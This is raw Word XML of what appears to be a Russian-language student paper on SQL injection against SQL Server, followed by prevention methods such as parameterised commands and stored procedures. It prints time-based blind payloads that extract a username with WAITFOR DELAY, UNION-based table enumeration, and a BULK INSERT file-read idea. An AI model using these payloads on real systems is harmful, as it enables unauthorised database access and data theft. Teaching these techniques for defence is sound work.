        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F54FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">='USERS' and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&gt;'USER')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="0075381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F54FFF" w:rsidRDefault="00EE02CA"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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00F54FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 USER from USERS)=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>после</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сами</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>символы</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, сочетание которых оказывается " ADMIN":</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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 USER from USERS),1,1))=97)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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 USER from USERS),2,1))=100)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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 USER from USERS),3,1))=109)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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 USER from USERS),4,1))=105)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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY '00:00:10'--  (+10 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017464E" w:rsidRPr="00EE02CA" w:rsidRDefault="0017464E"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8E2951" w:rsidRPr="009F0170" w:rsidRDefault="008E2951" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc420429533"/>
      <w:bookmarkStart w:id="9" w:name="_Toc420596240"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Применение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-кода на собственном приложении</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>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546FBD" w:rsidRDefault="00546FBD" w:rsidP="00165AA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9"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0"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8F0DAD" w:rsidRDefault="00546FBD" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>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1"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2"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">все </w:t>
      </w:r>
      <w:r w:rsidR="00A852C0" w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>имена таблиц</w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> созданных</w:t>
      </w:r>
      <w:r w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">and '1' = '2' </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Union  </w:t>
      </w:r>
      <w:r w:rsidR="008B701A" w:rsidRPr="008B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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8B701A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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3"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4"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165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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5"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следухим</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165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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Это легко можно сделать зная имя файла и расположение. Для этого необходимо воспользоваться оператором bulk insert</w:t>
      </w:r>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9F0170" w:rsidRDefault="00D11F44" w:rsidP="00D11F44">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>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A852C0" w:rsidRDefault="00A852C0" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc420429534"/>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:p w:rsidR="004936B0" w:rsidRDefault="004936B0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRPr="004936B0" w:rsidRDefault="00A852C0" w:rsidP="004936B0"/>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="008F0DAD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc420596241"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Способы предотвращения</w:t>
      </w:r>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql-инъекций</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00800878" w:rsidRDefault="008F0DAD" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc420429536"/>
      <w:bookmarkStart w:id="13" w:name="_Toc420596242"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1) Использование параметризованных команд</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00FC4D17"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FC4D17">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FC4D17">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FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00FC4D17"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FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00FC4D17">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Customers</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00FC4D17">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WHERE</w:t>
      </w:r>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomerID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="00FC4D17">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8F0DAD" w:rsidRPr="003B32C2"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3B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> * FROM Customers WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomerID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = @</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F0DAD" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Синтаксис параметризованных команд у различных поставщиков выглядит немного по-разному. В поставщике SQL Server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Parameter для каждого параметра, который вставляется в коллекцию Command.Parameters.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Server, поскольку соответствие между параметрами и заполнителями задается с помощью имен.</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sql. В любом случае, используя параметризованные команды, ни один вредоносный скрипт,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cmd.Parameters.AddWithValue("@CustID", id);</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46706C" w:rsidRPr="009F0170" w:rsidRDefault="0046706C" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc420429537"/>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00800878" w:rsidRDefault="008F0DAD" w:rsidP="004936B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc420596243"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2) Использование хранимых процедур</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>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позволяют реализовать более безопасное обращение с базой данных. Например, вы можете позволить учетной записи Windows,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 SQL Server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r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w: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6" w:name="_Toc420429538"/>
      <w:bookmarkStart w:id="17" w:name="_Toc420596244"/>
      <w:r w:rsidRPr="00800878">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3)Проверка всех данных, вводимых пользователем</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>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Практический все приложения или сайты, работающие с СУБД, обрабатывают данные, приходящие от клиенты на сервер. Эти данные могут находиться в url странице, поле для ввода информации, теле post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4) Никогда не создавайте инструкции Transact-SQL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w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>через пользовательский интерфейс, и далее во всех последующих точках пересечения границ доверенной зоны.</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8) По возможности отклоняйте вводимые данные, содержащие следующие </w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>символы</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> запросов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b)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c)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d) Разделители комментариев. Текст, заключенный между символами /* и */, не обрабатывается сервером - /* ... */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670F38" w:rsidRDefault="00670F38" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc420429539"/>
      <w:bookmarkStart w:id="19" w:name="_Toc326105875"/>
      <w:bookmarkStart w:id="20" w:name="_Toc418778187"/>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bookmarkEnd w:id="18"/>
    <w:p w:rsidR="003B32C2" w:rsidRPr="009F0170" w:rsidRDefault="003B32C2" w:rsidP="003B32C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="20"/>
    <w:p w:rsidR="004936B0" w:rsidRDefault="00670F38" w:rsidP="00020A8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w: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020A8D" w:rsidRPr="00D21A0A" w:rsidRDefault="00020A8D" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc420429540"/>
      <w:bookmarkStart w:id="22" w:name="_Toc420596245"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Список литературы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="003B32C2" w:rsidRDefault="00D3591E" w:rsidP="005678D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A02D75"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rPr>
        <w:t>Атака</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection: https://technet.microsoft.com/. -URL: https://technet.microsoft.com/ru-ru/library/ms161953(v=sql.105).aspx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Написание защищенного динамического SQL-кода в SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ADO.NET) : http</w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s://msdn.microsoft.com/ru-ru/</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https://msdn.microsoft.com/ru-ru/library/vstudio/bb669091(v=vs.100).aspx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Противодействие атакам, использующим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-инъекции: http://www.ibm.com/developerworks/ru/. -</w:t>
      </w:r>
      <w:r w:rsidRPr="006A740F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
